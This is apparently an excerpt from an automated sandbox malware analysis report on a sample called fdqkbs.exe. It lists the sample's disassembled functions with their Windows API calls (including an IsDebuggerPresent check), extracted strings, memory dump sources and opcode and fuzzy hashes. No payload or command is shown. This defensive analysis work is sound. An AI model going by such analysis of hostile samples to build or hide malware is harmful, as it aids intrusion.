Instruction ID: 84c7de714e14b8f6396cb47db4973091cb91ce27109949b3789f30f30ef8c4cf
Opcode Fuzzy Hash: 89fc7aae42d4256126bf1b601a9f3451df245325df85e9b6be198a9795d68f73
Instruction Fuzzy Hash: F611E3B5900248DFDB10CF9AD484BDEBBF8EB48314F10841AE559B7700D375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 050750D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 0507D29D

Strings

LR;v, xrefs: 0507D25A

Memory Dump Source

Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd

Similarity

API ID: MessagePost
String ID: LR;v
API String ID: 410705778-443218294
Opcode ID: 6255049e5784b5037d08922a4b32ac4258e927d1a8029b72b1ab7a0773aad8c1
Instruction ID: b5d126d700ea33fc16d5215b517f250f947ff00af25786f224630eef1601c257
Opcode Fuzzy Hash: 6255049e5784b5037d08922a4b32ac4258e927d1a8029b72b1ab7a0773aad8c1
Instruction Fuzzy Hash: 6911F5B58042489FDB10DF9AD444BDEBBF8EB58310F10841AE919B7700D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 022C95C8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E

Strings

LR;v, xrefs: 022C95E7

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: HandleModule
String ID: LR;v
API String ID: 4139908857-443218294
Opcode ID: d4f68db9cf6c8ae4e85a98bc96bba56fe798039d66daaf250c8f87913c73b49b
Instruction ID: cc35f36ae11a54feb0eb1eb7a148bd46996255fe97f4b1768f33a383bae27ca8
Opcode Fuzzy Hash: d4f68db9cf6c8ae4e85a98bc96bba56fe798039d66daaf250c8f87913c73b49b
Instruction Fuzzy Hash: 8B110FB5C002498FCB10CF9AC844ADEFBF4AB88324F20851AD869B7744C378A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 022CFE38 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 022CFE9D

Strings

LR;v, xrefs: 022CFE5A

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: LongWindow
String ID: LR;v
API String ID: 1378638983-443218294
Opcode ID: 32ed5755ceafefe5e8fde8b30d0ef42fdf97d3527168558db582663c37515952
Instruction ID: ad3792f9e065ae55c03a456279c7cb1166d1eb08401acefffa96ef7f0d2615a4
Opcode Fuzzy Hash: 32ed5755ceafefe5e8fde8b30d0ef42fdf97d3527168558db582663c37515952
Instruction Fuzzy Hash: 8D1133B5800209CFDB10DF9AC684BDEBBF4EB48324F20851AD859B7741C378AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 022CFE40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 022CFE9D

Strings

LR;v, xrefs: 022CFE5A

Memory Dump Source

Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd

Similarity

API ID: LongWindow
String ID: LR;v
API String ID: 1378638983-443218294
Opcode ID: 56807ba060ef35ad32f19c5d50d494e2c5eb335abc48fbfb1f87dca21f1aca49
Instruction ID: 5fc9ae145cc7f159cbe3fb2a657924860bf70dc42202a32183674b323b999007
Opcode Fuzzy Hash: 56807ba060ef35ad32f19c5d50d494e2c5eb335abc48fbfb1f87dca21f1aca49
Instruction Fuzzy Hash: 741103B58002098FDB10CF9AD584BDEBBF8EB48324F20855AD818B7701C378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407507 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,00404A94), ref: 0040750A
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00404A94), ref: 00407549

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
Instruction ID: b1f7f09f612f60460f80359e47cfd29f29434f3d7477643bc4f3bdfe63dfc6bb
Opcode Fuzzy Hash: 687c54f429ede6c9a3700f1b62dc63b57466bf3dfbcabf1351402392e6b5ef8b
Instruction Fuzzy Hash: 44E09B3754D63136D112323A7C4999F1A0DCFC6679715023BF4147A2C5EE789D0200EE

Uniqueness

Uniqueness Score: -1.00%

Function 004064AE Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?), ref: 004064EF

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D48 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
Instruction ID: 65cd16bcdc1b8bd721fcda30d9bca64849d6530a3f0c9080c4415b1d98ca3938
Opcode Fuzzy Hash: 8f5a00a2164cb918ef53a9def0475eb471bdd7ac5a97f66a80c2262a2e0ab220
Instruction Fuzzy Hash: 9FE0A931A0862456EA202B269C00F6B3A498F823B0B154233EC05B62D2DA7DE80182AF

Uniqueness

Uniqueness Score: -1.00%

Function 008FD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91bf27941265bdad5d9d7bda7ef7875a5acd4e4256704c2bab282f4423983198
Instruction ID: 57735c2be2c00fc7476b254abe96ffc6dc27baa9bd32b08c287f9e08f9e84d15
Opcode Fuzzy Hash: 91bf27941265bdad5d9d7bda7ef7875a5acd4e4256704c2bab282f4423983198
Instruction Fuzzy Hash: 1321D3B1504348DFDB15DF24D8C0B36BF66FB98318F24C569EA058B246C33AD856DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008FD5B0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 287707365fb8d38a9a6aa0169cfab5c0af3793bcfd087d01d24ad0af87eb374f
Instruction ID: dca2cefe43a6639fd33c52e2a13664e41b7e5efd2cd1a7fc8737f8ad5be58c13
Opcode Fuzzy Hash: 287707365fb8d38a9a6aa0169cfab5c0af3793bcfd087d01d24ad0af87eb374f
Instruction Fuzzy Hash: 9F21C1B1504348DFDB15DF24D8C0B26BF66FBA8314F348569EA098B246C33AD856DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0090D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45193c3fb9dc748cf1cc5b26fd849c1f94ebd90fdea9413cbd4a93bc83d827b6
Instruction ID: 04543e14bf0766eec147c4aaa5bb059dc8d63dc0e815fa216b22e0dc1dd38597
Opcode Fuzzy Hash: 45193c3fb9dc748cf1cc5b26fd849c1f94ebd90fdea9413cbd4a93bc83d827b6
Instruction Fuzzy Hash: 5B21D471905240EFDB05DF98D9C0B26BBA5FB88314F24CA6DE8494B286C33AD846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0090D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0773906eb5eaf21f061a1307f0e64be6735b1971017d1ff0df49e8e4c2cd3097
Instruction ID: 1cfd3293b52ad95a4a11793d3ed770b84ffa687f0a67906e0ec6a4cf08373ea9
Opcode Fuzzy Hash: 0773906eb5eaf21f061a1307f0e64be6735b1971017d1ff0df49e8e4c2cd3097
Instruction Fuzzy Hash: 7421C275604240DFDB15DF64D8C4B26BBB9FB88314F24C969E84E4B286C33AD846CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008FD5AB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
Instruction ID: 678f39ca813edf403f19b87e36fe53b8d9ab254fb70b58d4f4db5766fe34a9a8
Opcode Fuzzy Hash: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
Instruction Fuzzy Hash: 2511B176904284CFDB12CF10D5C4B26BF72FB94324F24C6A9DA098B216C33AD856CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 008FD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
Instruction ID: c826abebffee5effa13a7bc9fb6a05fd5e9636731d644dadfc7b76cf2ba168c0
Opcode Fuzzy Hash: a30ec54f9a54b6d7c9e3aee45e7f4ac53dfe1a9eddc68f9a16636451495a4f50
Instruction Fuzzy Hash: 0711D676904384CFDB11CF14D5C4B16BF72FB88314F24C6A9D9454B656C336D456CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0090D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
Instruction ID: eb2821a3bd9950fde9409bb31e63ef2b84fd56d11f4b42f083e80be9a3760c42
Opcode Fuzzy Hash: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
Instruction Fuzzy Hash: 99118B75904280DFDB11CF54D5D4B15BBB2FB84324F24C6AAD8494B696C33AD84ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0090D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280359183.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_90d000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
Instruction ID: b7b689c876e92e597b0fbebe93d8e2c81a52fc6318727b9735f9180e3345c20d
Opcode Fuzzy Hash: c3364e02cfa8d68cc02e7d961ad0f09aaf9bdd96dc08ed4b3430cf65677459e1
Instruction Fuzzy Hash: 9B11DD76904280DFDB12CF58D5C0B15FBB2FB84314F24C6AED8494B696C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 008FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58125daf11916169e28de9ed2d5df4e436f9375eebc7b8c7bf15c48a9f121cfd
Instruction ID: c144ad2ebb2f6a27ee0d62a909211b6aa1c5f80a12fd541b41904f8c1caf1680
Opcode Fuzzy Hash: 58125daf11916169e28de9ed2d5df4e436f9375eebc7b8c7bf15c48a9f121cfd
Instruction Fuzzy Hash: 3801FC314087489AE7104A35DC80776BFD8FFC1364F18C11AEF489F242D7789805C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 008FD01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.280299116.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8fd000_fdqkbs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2d783e5f0d30612a75f5e20b903187aa0d0343a7aa9bb1495544d5231cb5e55
Instruction ID: d5a9393e3a2607a40380549383c1842db519cec576b23acc15fbcc46351bf9d0
Opcode Fuzzy Hash: c2d783e5f0d30612a75f5e20b903187aa0d0343a7aa9bb1495544d5231cb5e55
Instruction Fuzzy Hash: D5F06271404784AEE7108E2ADC84B62FFD8EB91734F28C55AEE485F286C7799C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401C83 Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401C8F
IsDebuggerPresent.KERNEL32 ref: 00401D5B
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401D7B
UnhandledExceptionFilter.KERNEL32(?), ref: 00401D85

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
Instruction ID: 03da4fdce737ae66b50b035683398d13283d912606226935be00c523356d6f7c
Opcode Fuzzy Hash: 0b03b5c64497572952368c5c8e79ee91cfa7b3dc5a2986fe4eff801d6595a585
Instruction Fuzzy Hash: F4314C75D0131C9BDB10DF61D949BCDBBB8BF08304F1041AAE44CAB290EB745A848F48

Uniqueness

Uniqueness Score: -1.00%

Function 0040207B Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004038EB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00403A0A
___TypeMatch.LIBVCRUNTIME ref: 00403B18
_UnwindNestedFrames.LIBCMT ref: 00403C6A
CallUnexpected.LIBVCRUNTIME ref: 00403C85

Strings

csm, xrefs: 00403A41
csm, xrefs: 00403995
csm, xrefs: 00403928

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
Instruction ID: eb951dfd93c377336a0bd22ac6a7177933b6abc1ee62d3cbfcc6e570eabf6f1d
Opcode Fuzzy Hash: d2805ed157ee1a0de980ebf95ce551697e3ac2d298d2a0e6c6e08f639c5bac21
Instruction Fuzzy Hash: 00B17A75900209DFCF15DFA5C9819AEBBB8BF04316F14416BE8017B292C379EA51CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00402310 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00402347
___except_validate_context_record.LIBVCRUNTIME ref: 0040234F
_ValidateLocalCookies.LIBCMT ref: 004023D8
__IsNonwritableInCurrentImage.LIBCMT ref: 00402403
_ValidateLocalCookies.LIBCMT ref: 00402458

Strings

csm, xrefs: 004023ED
<&@, xrefs: 004023F5, 004023FE, 0040240F

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: <&@$csm
API String ID: 1170836740-4289465445
Opcode ID: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
Instruction ID: e86dbd8585806dd5d23d3718c6f18d027200fadb66ce12341b0a8af8e769dc64
Opcode Fuzzy Hash: 62bc818260f3d61d15a3a2816a247d7c989dff70b0980e5c6bc77aebcd7fc6d4
Instruction Fuzzy Hash: EF41D734A002199BCF10DF69C988A9EBBB0AF44314F14807AED14BB3D2D7B9DA55CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004082D3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,120632A0,?,004083E2,00000002,00000000,00000000), ref: 00408394

Strings

api-ms-, xrefs: 0040832A
ext-ms-, xrefs: 0040833E

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
Instruction ID: 573f1ada4d3828c880b6c39e4f7b2ce1dfde6baafd70aff868d57e190d54574b
Opcode Fuzzy Hash: c9283d596dd430a65ff98e794139049b5b5b47e480c88dd665e719789acae378
Instruction Fuzzy Hash: F1212B32A00221EBC7219B229D40A9F3368EB81B60F25053AED55B73D0DF79ED01CADD

Uniqueness

Uniqueness Score: -1.00%

Function 004029C1 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C

Uniqueness

Uniqueness Score: -1.00%

Function 00404F84 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,120632A0,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED

Strings

CorExitProcess, xrefs: 00404FC3
mscoree.dll, xrefs: 00404FB2

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00409AC0 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00409B45
__alloca_probe_16.LIBCMT ref: 00409C0E
__freea.LIBCMT ref: 00409C75

Part of subcall function 00407D48: RtlAllocateHeap.NTDLL(00000000,00406E77,?), ref: 00407D7A

__freea.LIBCMT ref: 00409C88
__freea.LIBCMT ref: 00409C95

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
Opcode Fuzzy Hash: f6944c5e00c5e4c39a1b83b9d8c7ae9ea2b5230d77e8078ec350ae024e7a64ca
Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669

Uniqueness

Uniqueness Score: -1.00%

Function 00404751 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\fdqkbs.exe, xrefs: 0040478F, 00404796, 004047B3, 004047C8, 00404800
]A, xrefs: 0040479E
8H], xrefs: 00404812, 00404868

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID:
String ID: ]A$8H]$C:\Users\user\AppData\Local\Temp\fdqkbs.exe
API String ID: 0-25343034
Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98

Uniqueness

Uniqueness Score: -1.00%

Function 00402BE3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22

Strings

api-ms-, xrefs: 00402C07

Memory Dump Source

Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
